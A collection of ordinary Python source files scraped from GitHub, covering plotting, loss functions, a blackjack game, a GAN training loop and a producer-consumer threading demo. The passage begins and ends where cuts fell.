rp_total_tries, number_of_features, X_train, pca_reconstruction_losses, data_set_name):\n total_tries = rp_total_tries\n components_range = range(1, number_of_features + 1)\n reconstruction_losses = []\n standard_devs = []\n for n_components in components_range:\n sub_reconstruction_losses = []\n for n_try in range(total_tries):\n transformer = InvertibleRandomProjection(n_components=n_components)\n X_transformed = transformer.fit_transform(X_train)\n reconstructed = transformer.inverse_transform(X_transformed)\n reconstruction_loss = ((X_train - reconstructed) ** 2).mean()\n sub_reconstruction_losses.append(reconstruction_loss)\n reconstruction_losses.append(np.array(sub_reconstruction_losses).mean())\n standard_devs.append(np.std(np.array(sub_reconstruction_losses)))\n\n\n print('RP standard devs')\n print(standard_devs)\n plt.xlabel(\"Number of Components\")\n plt.ylabel(\"Reconstruction Error\")\n title = \"MNIST\"\n if data_set_name != 'mnist':\n title = 'Wine'\n plt.title(title + \": Randmized Projection vs. PCA in Reconstruction Error\")\n xticks_names = []\n for n in list(components_range):\n xticks_names.append(str(n))\n # plt.xticks(components_range, xticks_names)\n # plt.yticks()\n\n plt.plot(components_range, reconstruction_losses, marker='o', label='Randomized Projection')\n plt.plot(components_range, pca_reconstruction_losses, marker='x', label='PCA')\n plt.legend()\n\n # plt.axvline(x=9, color=\"red\", linestyle=\"--\")\n plt.savefig('plots/' + data_set_name + '_rp_reconstruction_error_over_component.png')\n plt.close()","repo_name":"yilu1021/dr3","sub_path":"rp.py","file_name":"rp.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72656064212","text":"num_pencils = int(input())\r\nnum_markers = int(input())\r\nliters_cleaner = int(input())\r\ndiscount = int(input()) / 100\r\n\r\npencils_price = 5.80 * num_pencils\r\nmarker_price = 7.20 * num_markers\r\ncleaner_price = 1.20 * liters_cleaner\r\nprice_for_all_mat = pencils_price + marker_price + cleaner_price\r\nprice_with_disc = price_for_all_mat - (price_for_all_mat * discount)\r\n\r\nprint(price_with_disc)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MarinTabakov/SoftUniLearning","sub_path":"1st_steps_in_programming/Excercise/supplies_for_school.py","file_name":"supplies_for_school.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30398518849","text":"#import required modules\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n#create new data frame from CSV for accounts receivable\r\nrecs = pd.read_csv(\"accounts_receivable.csv\")\r\nrecs[\"inv_date\"] = pd.to_datetime(recs[\"inv_date\"])\r\nrecs[\"due_date\"] = pd.to_datetime(recs[\"due_date\"])\r\nrecs[\"paid_date\"] = pd.to_datetime(recs[\"paid_date\"])\r\n\r\n#create a new column for age of the receivable\r\nrecs[\"age\"] = recs[\"paid_date\"] - recs[\"inv_date\"] \r\n\r\n#create a new column for late receivables\r\nrecs[\"late\"] = recs[\"paid_date\"] > recs[\"due_date\"]\r\n\r\n#display the data to the user\r\nprint(recs.dtypes)\r\nprint(recs.head())\r\n\r\n#describe statistics for score and age\r\nprint(\" Descriptive statistics for credit score: \")\r\nprint(recs[\"score\"].describe())\r\nprint(\" Descriptive statistics for age: \")\r\nprint(recs[\"age\"].dt.days.describe())\r\n\r\n#import python library matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\n#create a histogram for the age of the receivable when paid (days)\r\nplt.hist(x=recs[\"age\"].dt.days, bins=20)\r\n\r\n#label the age of receivables histogram\r\nplt.xlabel(\"Age\")\r\nplt.ylabel(\"Frequency\")\r\nplt.title(\"Age of Receivables when Paid\")\r\n\r\n#display the age of receivable histogram\r\nprint(plt.show())\r\n\r\n#create a scatterplot with respective labels\r\nplt.scatter(recs[\"age\"].dt.days, recs[\"score\"])\r\nplt.xlabel(\"Age\")\r\nplt.ylabel(\"Frequency\")\r\nplt.title(\"Age of Receivables when Paid\")\r\n\r\n#import the scipy model\r\nfrom scipy.stats import pearsonr\r\nimport scipy\r\nimport statsmodels.api as sm\r\n\r\n#create a correlation and display it\r\nprint(\" Correlation coeifficient and p-value: \")\r\nprint(pearsonr(recs[\"age\"].dt.days, recs[\"score\"]))\r\n\r\n#create two variables for linear regression\r\ny = recs[\"age\"].dt.days\r\nx = recs[\"score\"]\r\n\r\n#add the constant for linear regression\r\nx = sm.add_constant(x)\r\n\r\n#create the linear regression model\r\nmod = sm.OLS(y, x)\r\n\r\n#estimate the fit of the linear regression model\r\nresults = mod.fit()\r\n\r\n#print the results\r\nprint(results.summary())\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BayleePeters/Exercise-Week-9","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7502153517","text":"\"\"\"Repackages sea ice parcel trajectories\"\"\"\n\nfrom pathlib import Path\n\nimport csv\nimport datetime as dt\n\nimport numpy as np\nimport xarray as xr\n\nfrom affine import Affine\n\n\nGEOTRANSFORM = (-4524683.8, 25067.5, 0.0, 4524683.8, 0.0, 25067.5)\nPROJECTION = \"+proj=laea +lat_0=90 +lon_0=0 +x_0=0 +y_0=0 +a=6371228 +b=6371228 +units=m +no_defs\"\nEPSG = 3408\n\n\nclass Parcel():\n \"\"\"Class to hold parcel trajectory\"\"\"\n\n def __init__(self, data, year, week_start='08-01'):\n row, column, concentration = zip(*zip(*(iter(data),) * 3))\n ntime = len(row)\n time = get_datetime(year, week_start, nweeks=ntime)\n x, y = to_projected_coordinates(column, row)\n self.time = time\n self.row = np.array(row)\n self.column = np.array(column)\n self.x = np.array(x)\n self.y = np.array(y)\n self.concentration = np.array(concentration)\n\n def __str__(self):\n \"\"\"return str representation\"\"\"\n header = ['time', 'row', 'column', 'x', 'y', 'concentration']\n string = []\n string.append('-'*57+'\\n')\n string.append(' '.join(header)+'\\n')\n string.append('-'*57+'\\n')\n zipped = zip(self.time,\n self.row,\n self.column,\n self.x,\n self.y,\n self.concentration)\n for t, r, c, x, y, s in zipped:\n string.append(f'{t.strftime(\"%Y-%m-%d\")} {r:7.3f} {c:7.3f} {x:11.3f} {y:11.3f} {s:5.1f}\\n')\n return ''.join(string)\n\n\ndef to_projected_coordinates(col, row):\n fwd = Affine.from_gdal(*GEOTRANSFORM)\n xs = []\n ys = []\n for c, r in zip(col, row):\n if c < 999.0:\n x, y = fwd * (c, r)\n else:\n x, y = np.nan, np.nan\n xs.append(x)\n ys.append(y)\n return xs, ys\n\n\ndef get_datetime(year, week_start, nweeks=52):\n date_start = dt.datetime.strptime(f'{year}-{week_start}', '%Y-%m-%d')\n return [date_start + dt.timedelta(weeks=w) for w in range(nweeks)]\n\n\ndef load_parcels(filepath):\n year = filepath.split('_')[2][:4]\n with open(filepath, 'r', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',',\n quoting=csv.QUOTE_NONNUMERIC)\n return [Parcel(data, year) for data in csvreader]\n\n\ndef stack_parcels(parcels):\n \"\"\"Creates 2D (time, trajectory) arrays\"\"\"\n arr = np.stack([p.row for p in parcels], axis=1)\n\n\ndef to_xarray(parcels):\n dims = ['time', 'trajectory']\n ds = xr.Dataset(\n {\n 'row': (dims, np.stack([p.row for p in parcels], axis=1)),\n 'col': (dims, np.stack([p.column for p in parcels], axis=1)),\n 'x': (dims, np.stack([p.x for p in parcels], axis=1)),\n 'y': (dims, np.stack([p.y for p in parcels], axis=1)),\n 'concentration': (dims, np.stack([p.concentration for p in parcels], axis=1)),\n },\n coords={\n 'time': parcels[0].time,\n 'trajectory': np.arange(len(parcels)),\n })\n return ds\n\n\n'''with zipfile.Zipfile(\"parcels.xyz.2019w40_2020w40.zip\", \"w\") as archive:\n ...: for idx, parcel in enumerate(parcels):\n ...: if idx > 10: break\n ...: filename = f'parcel{idx:06d}.csv'\n ...: parcel.to_csv(filename)\n ...: archive.write(filename)\n'''\n","repo_name":"andypbarrett/sea_ice_parcels","sub_path":"repackage_data.py","file_name":"repackage_data.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71887243095","text":"from typing import Any, List, Union\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass BinaryFocalLoss(nn.Module):\n \"\"\"\n This is a implementation of Focal Loss with smooth label cross entropy supported\n which is proposed in 'Focal Loss for Dense Object Detection.\n (https://arxiv.org/abs/1708.02002)' Focal_Loss= -1*alpha*(1-pt)*log(pt)\n :param num_class:\n :param alpha: (tensor) 3D or 4D the scalar factor for this criterion\n :param gamma: (float,double) gamma > 0 reduces the relative loss for well-classified\n examples (p>0.5) putting more focus on hard misclassified example\n\n :param reduction: `none`|`mean`|`sum`\n :param **kwargs\n balance_index: (int) balance class index, should be specific when alpha is float\n \"\"\"\n\n def __init__(\n self,\n alpha: Union[List[float], np.ndarray] = [1.0, 1.0],\n gamma: int = 2,\n ignore_index: Any = None,\n reduction: str = \"mean\",\n ) -> None:\n super(BinaryFocalLoss, self).__init__()\n if alpha is None:\n alpha = [0.25, 0.75]\n self.alpha = alpha\n self.gamma = gamma\n self.smooth = 1e-6\n self.ignore_index = ignore_index\n self.reduction = reduction\n\n assert self.reduction in [\"none\", \"mean\", \"sum\"]\n\n if self.alpha is None:\n self.alpha = torch.ones(2)\n elif isinstance(self.alpha, (list, np.ndarray)):\n self.alpha = np.asarray(self.alpha)\n self.alpha = np.reshape(self.alpha, (2))\n assert (\n self.alpha.shape[0] == 2\n ), \"the `alpha` shape is not match the number of class\"\n elif isinstance(self.alpha, (float, int)):\n self.alpha = np.asarray(\n [self.alpha, 1.0 - self.alpha], dtype=np.float\n ).view(2)\n\n else:\n raise TypeError(\"{} not supported\".format(type(self.alpha)))\n\n def forward(self, output: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n prob = torch.sigmoid(output)\n prob = torch.clamp(prob, self.smooth, 1.0 - self.smooth)\n\n pos_mask = (target == 1).float()\n neg_mask = (target == 0).float()\n\n pos_loss = (\n -self.alpha[0]\n * torch.pow(torch.sub(1.0, prob), self.gamma)\n * torch.log(prob)\n * pos_mask\n )\n neg_loss = (\n -self.alpha[1]\n * torch.pow(prob, self.gamma)\n * torch.log(torch.sub(1.0, prob))\n * neg_mask\n )\n\n neg_loss = neg_loss.sum()\n pos_loss = pos_loss.sum()\n num_pos = pos_mask.view(pos_mask.size(0), -1).sum()\n num_neg = neg_mask.view(neg_mask.size(0), -1).sum()\n\n if num_pos == 0:\n loss = neg_loss\n else:\n loss = pos_loss / num_pos + neg_loss / num_neg\n return loss\n\n\nclass FocalLoss_Ori(nn.Module):\n \"\"\"\n This is a implementation of Focal Loss with smooth label cross entropy supported\n which is proposed in'Focal Loss for Dense Object Detection.\n (https://arxiv.org/abs/1708.02002)' Focal_Loss= -1*alpha*(1-pt)*log(pt)\n :param num_class:\n :param alpha: (tensor) 3D or 4D the scalar factor for this criterion\n :param gamma: (float,double) gamma > 0 reduces the relative loss for\n well-classified examples (p>0.5) putting more focus on hard misclassified example\n :param smooth: (float,double) smooth value when cross entropy\n :param size_average: (bool, optional) By default, the losses are averaged\n over each loss element in the batch.\n \"\"\"\n\n def __init__(\n self,\n num_class: int,\n alpha: Any = [0.25, 0.75],\n gamma: int = 2,\n balance_index: int = -1,\n size_average: bool = True,\n ) -> None:\n super(FocalLoss_Ori, self).__init__()\n self.num_class = num_class\n self.alpha = alpha\n self.gamma = gamma\n self.size_average = size_average\n self.eps = 1e-6\n\n if isinstance(self.alpha, (list, tuple)):\n assert len(self.alpha) == self.num_class\n self.alpha = torch.Tensor(list(self.alpha))\n elif isinstance(self.alpha, (float, int)):\n assert 0 < self.alpha < 1.0, \"alpha should be in `(0,1)`)\"\n assert balance_index > -1\n alpha = torch.ones((self.num_class))\n alpha *= 1 - self.alpha\n alpha[balance_index] = self.alpha\n self.alpha = alpha\n elif isinstance(self.alpha, torch.Tensor):\n self.alpha = self.alpha\n else:\n raise TypeError(\n \"Not support alpha type, expect `int|float|list|tuple|torch.Tensor`\"\n )\n\n def forward(self, logit: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n\n if logit.dim() > 2:\n # N,C,d1,d2 -> N,C,m (m=d1*d2*...)\n logit = logit.view(logit.size(0), logit.size(1), -1)\n logit = logit.transpose(1, 2).contiguous() # [N,C,d1*d2..] -> [N,d1*d2..,C]\n logit = logit.view(-1, logit.size(-1)) # [N,d1*d2..,C]-> [N*d1*d2..,C]\n target = target.view(-1, 1) # [N,d1,d2,...]->[N*d1*d2*...,1]\n\n # -----------legacy way------------\n # idx = target.cpu().long()\n # one_hot_key = torch.FloatTensor(target.size(0), self.num_class).zero_()\n # one_hot_key = one_hot_key.scatter_(1, idx, 1)\n # if one_hot_key.device != logit.device:\n # one_hot_key = one_hot_key.to(logit.device)\n # pt = (one_hot_key * logit).sum(1) + epsilon\n\n # ----------memory saving way--------\n pt = logit.gather(1, target).view(-1) + self.eps # avoid apply\n logpt = pt.log()\n\n if self.alpha.device != logpt.device:\n alpha = self.alpha.to(logpt.device)\n alpha_class = alpha.gather(0, target.view(-1))\n logpt = alpha_class * logpt\n loss = -1 * torch.pow(torch.sub(1.0, pt), self.gamma) * logpt\n\n if self.size_average:\n loss = loss.mean()\n else:\n loss = loss.sum()\n return loss\n\n\ndef f_score(\n pr: torch.Tensor,\n gt: torch.Tensor,\n beta: int = 1,\n eps: float = 1e-7,\n threshold: Any = None,\n activation: str = \"sigmoid\",\n) -> torch.Tensor:\n \"\"\"\n Args:\n pr (torch.Tensor): A list of predicted elements\n gt (torch.Tensor): A list of elements that are to be predicted\n eps (float): epsilon to avoid zero division\n threshold: threshold for outputs binarization\n Returns:\n float: IoU (Jaccard) score\n \"\"\"\n\n # if activation is None or activation == \"none\":\n # activation_fn = lambda x: x\n # elif activation == \"sigmoid\":\n # activation_fn = torch.nn.Sigmoid()\n # elif activation == \"softmax2d\":\n # activation_fn = torch.nn.Softmax2d()\n\n # else:\n # raise NotImplementedError(\"Activation implemented for sigmoid and softmax2d\")\n\n # pr = activation_fn(pr)\n # gt = torch.unsqueeze(gt, dim=1)\n\n if pr.dim() > 2:\n # N,C,d1,d2 -> N,C,m (m=d1*d2*...)\n pr = pr.view(pr.size(0), pr.size(1), -1)\n pr = pr.transpose(1, 2).contiguous() # [N,C,d1*d2..] -> [N,d1*d2..,C]\n pr = pr.view(-1, pr.size(-1)) # [N,d1*d2..,C]-> [N*d1*d2..,C]\n gt = gt.view(-1, 1) # [N,d1,d2,...]->[N*d1*d2*...,1]\n\n if threshold is not None:\n pr = (pr > threshold).float()\n\n tp = torch.sum(gt * pr).to(pr.device)\n fp = (torch.sum(pr) - tp).to(pr.device)\n fn = (torch.sum(gt) - tp).to(pr.device)\n\n score = ((1 + beta ** 2) * tp + eps) / (\n (1 + beta ** 2) * tp + beta ** 2 * fn + fp + eps\n )\n return score\n\n\nclass DiceLoss(nn.Module):\n def __init__(self, beta: float = 0.5, with_bce: Any = None) -> None:\n super(DiceLoss, self).__init__()\n self.beta = beta\n self.with_bce = with_bce\n\n def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n if self.with_bce is not None:\n bce = F.binary_cross_entropy_with_logits(input, target)\n smooth = 1e-5\n num = target.size(0)\n input = input.view(num, -1)\n target = target.view(num, -1)\n intersection = input * target\n dice = ((1 + self.beta ** 2) * intersection.sum(1) + smooth) / (\n (self.beta ** 2) * target.sum(1) + input.sum(1) + smooth\n )\n dice = 1 - dice.sum() / num\n\n if self.with_bce is not None:\n dice = dice + self.with_bce * bce\n return dice # + 0.5 * bce\n","repo_name":"IsHYuhi/FujiFilm_Brains_Solution","sub_path":"libs/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23502986301","text":"import random\n\ndef Intro():\n\n Play_BlackJack=input(\"Welcome to the table. You start out with 100 chips and each hand costs 2 chips. Try to get your cards to total 21 by asking for a card if you're under. If you go over, it's a bust. Ready to play? \")\n\n if(Play_BlackJack == \"No\" or Play_BlackJack == \"no\" or Play_BlackJack == \"N\" or Play_BlackJack == \"n\"):\n print(\"Sucks\\n\")\n elif (Play_BlackJack == \"Yes\" or Play_BlackJack == \"yes\" or Play_BlackJack == \"Y\" or Play_BlackJack == \"y\" or Play_BlackJack == \"YES\"):\n print(\"Good let's start!\\n\")\n\ndef BlackJack():\n\n j=0\n Coins=100\n print(str(Coins)+\" coins.\")\n\n while j<30:\n\n Bets=0\n Betm=0\n if (Coins>1): #While the user has coins they can play\n Computer_CardH=random.randint(1,10)\n Computer_CardS=random.randint(1,10)\n User_Cards1=random.randint(1,10)\n User_Cards2=random.randint(1,10)\n UCards=[User_Cards1, User_Cards2] #displays cards\n CCards=[Computer_CardH, Computer_CardS]\n Coins-=2\n print()\n User_Move=input(\"These are your cards \"+str(User_Cards1)+ \" \" + str(User_Cards2)+\" \\nDo you want to hit? You have \"+str(Coins)+ \" coins. Each hit costs 5 chips(y/n)\")\n else:\n print(\"Sorry\")\n print(\"Game Over\")\n R=input(\"Play again and start fresh with 100 coins?\")\n if (R!=(\"n\")):\n BlackJack()\n else:\n break\n \n i=0\n TwentyOneU=0\n TwentyOneC=0\n TwentyO=0\n TwentyOO=0\n TwentyO=User_Cards1+User_Cards2\n TwentyOneU=TwentyO\n\n if(Coins>4 and User_Move!=\"n\"):\n i=0\n Coins-=5\n Bets+=1\n\n while i<9:\n Hit=random.randint(1,10)\n UCards.append(Hit)\n print(\"\\n\"+str(UCards))\n TwentyOneU+=Hit\n\n if (TwentyOneU>21):\n print(\"Bust\")\n i+=10 \n\n elif(Coins>=0):\n print(str(Coins)+\" coins\")\n h=input(\"\\nHit? (y/n)\")\n if (h==\"n\"):\n i+=10\n elif(Coins>4 and h!=\"n\"): #pays coins & makes bet\n Coins-=5\n Bets+=1\n i+=1\n elif (Coins<5 and h!=\"n\"): #cant hit without sufficient coins\n i+=10\n\n if(User_Move==\"n\" or i>5 or Coins<5):\n print()\n print(\"Computer cards are \"+str(Computer_CardH)+\" \"+str(Computer_CardS))\n TwentyOO=Computer_CardH+Computer_CardS\n TwentyOneC=TwentyOO\n\n if(TwentyOneU==TwentyOneC and 17TwentyOneC and TwentyOneU<22): \n i=0\n Bets+=1\n\n while i<9:\n Hit=random.randint(1,10)\n CCards.append(Hit)\n print(CCards)\n TwentyOneC+=Hit\n\n if(TwentyOneC>21):\n print(\"Bust\")\n i+=10\n elif(TwentyOneU==TwentyOneC and 17TwentyOneU):\n i+=10\n\n elif(TwentyOneU>=TwentyOneC and TwentyOneU<22):\n Bets+=1\n i+=1\n\n elif(1721 or TwentyOneC>TwentyOneU):\n i+=10\n if(TwentyOneU==TwentyOneC and 175):\n print(\"\\nYou had \"+str(UCards)+\" \"+str(TwentyOneU)+\" Computer had \"+ str(CCards)+\" \"+str(TwentyOneC))\n if((TwentyOneU>TwentyOneC and TwentyOneU<22) or (TwentyOneC>21 and TwentyOneU<22) ):\n Betm+=(5*Bets)\n print(\"You win \"+str(Betm)+\" coins\")\n Coins+=Betm\n print(\"You have \"+str(Coins)+\" coins.\") \n if(Coins!=0):\n A=input(\"Again (y/n)?\")\n if (A==\"n\"):\n print(\"Bye!\")\n break\n else:\n j+=1\n else:\n print(\"Sorry\")\n print(\"Game Over\")\n R=input(\"Play again and start fresh with 100 coins?\")\n if (R!=(\"n\")):\n BlackJack()\n else:\n break\n\n elif((TwentyOneC>TwentyOneU and TwentyOneC<22) or (TwentyOneU>21 and TwentyOneC<22)):\n print(\"You lose\")\n print(\"You have \"+str(Coins)+\" coins.\") \n if(Coins!=0):\n A=input(\"Again (y/n)?\")\n if (A==\"n\"):\n print(\"Bye!\")\n break\n else:\n j+=1\n else:\n print(\"Sorry\")\n print(\"Game Over\")\n R=input(\"Play again and start fresh with 100 coins?\")\n if (R!=(\"n\")):\n BlackJack()\n else:\n break\n \n else:\n print(\"Tie. You have \" + str(Coins)+ \" coins\")\n j+=1\n \ndef main():\n Intro()\n BlackJack()\n\nif __name__ == '__main__':\n\n main()","repo_name":"aatrey56/blackjack","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31923764917","text":"import matplotlib.pyplot as plt\nimport argparse\nimport rospy\nimport numpy as np\nfrom pathlib import Path\n\ndef main():\n \"\"\"RSDK Joint Position Example: File Playback\n Uses Joint Position Control mode to play back a series of\n recorded joint and gripper positions.\n Run the joint_recorder.py example first to create a recording\n file for use with this example. This example uses position\n control to replay the recorded positions in sequence.\n Note: This version of the playback example simply drives the\n joints towards the next position at each time stamp. Because\n it uses Position Control it will not attempt to adjust the\n movement speed to hit set points \"on time\".\n \"\"\"\n epilog = \"\"\"\nRelated examples:\n record_trajectories.py; plot_trajectories_multi.py.\n \"\"\"\n arg_fmt = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(formatter_class=arg_fmt,\n description=main.__doc__,\n epilog=epilog)\n parser.add_argument(\n '-f', '--file', metavar='PATH', required=True,\n help='path to input file'\n )\n parser.add_argument(\n '-l', '--loops', type=int, default=1,\n help='number of times to loop the input file. 0=infinite.'\n )\n args = parser.parse_args(rospy.myargv()[1:])\n\n filename = Path(args.file).with_suffix('')\n\n data = np.loadtxt(args.file, skiprows=1, dtype='float', delimiter=\",\")\n\n time = data[:,0]\n joint1 = data[:,1]\n joint2 = data[:,2]\n joint3 = data[:,3]\n joint4 = data[:,4]\n joint5 = data[:,5]\n joint6 = data[:,6]\n gripper = data[:,7]\n\n # Separate plots for each joint in same figure [1,7]\n fig, axs = plt.subplots(1, 7)\n fig.set_size_inches(25, 5)\n axs[0].plot(time, joint1, c = 'b')\n axs[0].set_title('Joint 1')\n axs[1].plot(time, joint2, c = 'g')\n axs[1].set_title('Joint 2')\n axs[2].plot(time, joint3, c = 'r')\n axs[2].set_title('Joint 3')\n axs[3].plot(time, joint4, c = 'c')\n axs[3].set_title('Joint 4')\n axs[4].plot(time, joint5, c = 'm')\n axs[4].set_title('Joint 5')\n axs[5].plot(time, joint6, c = 'y')\n axs[5].set_title('Joint 6')\n axs[6].plot(time, gripper, c = 'k')\n axs[6].set_title('Gripper')\n\n for ax in axs.flat:\n ax.set(xlabel='Time (s)', ylabel='Joint Angle (rad)')\n\n # Hide x labels and tick labels for top plots and y ticks for right plots.\n for ax in axs.flat:\n ax.label_outer()\n\n fig_file = str(filename) + '_fig.png'\n plt.savefig(fig_file)\n plt.show()\n\n # Separate plots for each joint in same figure\n # fig, axs = plt.subplots(2, 3)\n # axs[0, 0].plot(time, joint1)\n # axs[0, 0].set_title('Joint 1')\n # axs[0, 1].plot(time, joint2, 'tab:orange')\n # axs[0, 1].set_title('Joint 2')\n # axs[0, 2].plot(time, joint3, 'tab:green')\n # axs[0, 2].set_title('Joint 3')\n # axs[1, 0].plot(time, joint4, 'tab:red')\n # axs[1, 0].set_title('Joint 4')\n # axs[1, 1].plot(time, joint5, 'tab:green')\n # axs[1, 1].set_title('Joint 5')\n # axs[1, 2].plot(time, joint6, 'tab:blue')\n # axs[1, 2].set_title('Joint 6')\n\n # for ax in axs.flat:\n # ax.set(xlabel='Time (s)', ylabel='Joint Angle (rad)')\n\n # for ax in axs.flat:\n # ax.label_outer()\n\n # fig_file = str(filename) + '_fig.png'\n # plt.savefig(fig_file)\n # plt.show()\n\n # All Joints on One Plot\n # plt.title('All Joints')\n # plt.xlabel('Time (s)')\n # plt.ylabel('Joint Angle (rad)')\n # plt.plot(time, joint1, c = 'b')\n # plt.plot(time, joint2, c = 'g')\n # plt.plot(time, joint3, c = 'r')\n # plt.plot(time, joint4, c = 'c')\n # plt.plot(time, joint5, c = 'm')\n # plt.plot(time, joint6, c = 'y')\n # plt.plot(time, gripper, c = 'k')\n\n # plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"chms-raf/raf-v2","sub_path":"scripts/LFD/plot_trajectories.py","file_name":"plot_trajectories.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35647233470","text":"from unsupervised_tools.unsupervised_utils import split_every, clamp_params, get_fake_obs_via_ECC, \\\n generation_step_and_save\nimport torch_geometric\nimport torch\n\n\ndef train_plain_gan(max_num_of_epochs, batch_size, list_of_observations, line_graphs_for_list_of_observations,\n dataset, device, N_CRITIC_STEPS, critic, ECC_nodes, ECC_edges, optimizer_critic,\n optimizer_nodes, optimizer_edges, critic_loss_log, generator_loss_log,\n rnn, output, absence_net, args, qm9_smiles):\n\n for epoch in range(max_num_of_epochs):\n # have to reset at each epoch, otherwise they run out and training stops\n iter_fake_graphs = split_every(batch_size, list_of_observations)\n iter_fake_line_graphs = split_every(batch_size, line_graphs_for_list_of_observations)\n iter_real_data = split_every(batch_size, dataset)\n\n crit_steps = 0\n\n for i in range(len(list_of_observations) // batch_size):\n\n real_batch_1 = next(iter_real_data)\n real_batch_2 = torch_geometric.data.DataLoader(real_batch_1, batch_size=batch_size, shuffle=True)\n real_batch_3 = iter(real_batch_2)\n real_batch_4 = real_batch_3.next()\n real_batch_4.to(device)\n\n nodes_batch_1 = next(iter_fake_graphs)\n edges_batch_1 = next(iter_fake_line_graphs)\n\n if crit_steps < N_CRITIC_STEPS:\n critic.train()\n critic.zero_grad()\n\n ECC_nodes.eval()\n ECC_edges.eval()\n\n clamp_params(critic)\n err_real = torch.mean(critic(real_batch_4)) # E[D(x)]\n\n fake_datalist = []\n for g_nodes, g_edges in zip(nodes_batch_1, edges_batch_1):\n fake_datalist.append(get_fake_obs_via_ECC(ECC_nodes, ECC_edges, g_nodes, g_edges, epoch))\n\n fake_dataloader_pyg = torch_geometric.data.DataLoader(fake_datalist, batch_size=batch_size, shuffle=True)\n fake_data_iterator = iter(fake_dataloader_pyg)\n batch_generated = fake_data_iterator.next()\n batch_generated.to(device)\n\n err_fake = torch.mean(critic(batch_generated)) # E[D(G(z))]\n\n critic_loss = err_fake - err_real # want this min\n critic_loss.backward() # retain_graph=True\n optimizer_critic.step()\n crit_steps += 1\n\n else:\n ECC_nodes.train()\n ECC_edges.train()\n ECC_nodes.zero_grad()\n ECC_edges.zero_grad()\n critic.eval()\n\n fake_datalist = []\n for g_nodes, g_edges in zip(nodes_batch_1, edges_batch_1):\n fake_datalist.append(get_fake_obs_via_ECC(ECC_nodes, ECC_edges, g_nodes, g_edges, epoch))\n\n fake_dataloader_pyg = torch_geometric.data.DataLoader(fake_datalist, batch_size=batch_size, shuffle=True)\n fake_data_iterator = iter(fake_dataloader_pyg)\n batch_generated = fake_data_iterator.next()\n batch_generated.to(device)\n\n output_critic_fake = critic(batch_generated)\n generator_loss = -torch.mean(output_critic_fake)\n generator_loss.backward()\n\n optimizer_nodes.step()\n optimizer_edges.step()\n crit_steps = 0\n\n critic_loss_log.info(str(epoch) + ' , ' + str(critic_loss.item()))\n generator_loss_log.info(str(epoch) + ' , ' + str(generator_loss.item()))\n\n print(\n f\"Epoch: {epoch}/{max_num_of_epochs}, batch: {i}/{len(list_of_observations) // batch_size}, Err_real - Err_fake = {critic_loss}, temp: {500 / (epoch + 1)}\")\n\n generation_step_and_save(epoch, ECC_nodes, ECC_edges, critic, rnn, output, absence_net, device,\n args,\n qm9_smiles)\n","repo_name":"marconobile/master_thesis","sub_path":"unsupervised_tools/unsupervised_training_loop.py","file_name":"unsupervised_training_loop.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15793190818","text":"def display_delete_activity():\n \"\"\"\n fonction qui charge un template html \n\n Returns : \n -------------------------\n str : html \n \"\"\"\n html = open('application/webservice/api/templates/remove.html',\"r\")\n resu=html.read()\n return resu \n\n \ndef delete_activity(filter,value_filter):\n \"\"\"\n fonction qui créée le bon format pour appliquer une suppression de document mongodb \n\n Parameters : \n ------------------------\n filter : str attribut sur lequel filtrer\n value_filter : valeur du filtre\n\n\n Returns : \n -------------------------\n dictionnary \n \"\"\"\n filtre={}\n filtre[filter]=value_filter \n \n data={\"database\" : \"activities\",\n \"collection\" : \"user_activities\", \n \"Filter\": filtre}\n\n return data","repo_name":"thomashilger67/genielog","sub_path":"application/webservice/api/display_delete.py","file_name":"display_delete.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36952216885","text":"#!/usr/bin/python3\n\nimport random\nimport time \nimport multiprocessing\nimport concurrent.futures as cf\n\nbuffer = []\nbuffer_size = 10\n\ncounter = 0\ninp = 0\nout = 0\n\nfor i in range(1,11):\n buffer.append(0)\n\ndef producer():\n global counter, inp, out\n\n while (True):\n while ( counter == buffer_size ):\n 0 # do nothing\n\n item = random.randint(1,100)\n buffer[inp] = item\n\n inp = (inp + 1) % buffer_size \n \n print(\"{P\")\n counter = counter + 1\t\t# critical section\n print(\"P}\")\n\ndef consumer():\n global counter, inp, out\n\n while (True):\n while ( counter == 0 ):\n 0 # do nothing\n\n item = buffer[out]\n\n out = (out + 1) % buffer_size\n \n print(\"{C\")\n counter = counter - 1\t\t# critical section\n print(\"C}\")\n \nexecutor = cf.ThreadPoolExecutor(max_workers=2)\n\nt1 = executor.submit(producer)\nt2 = 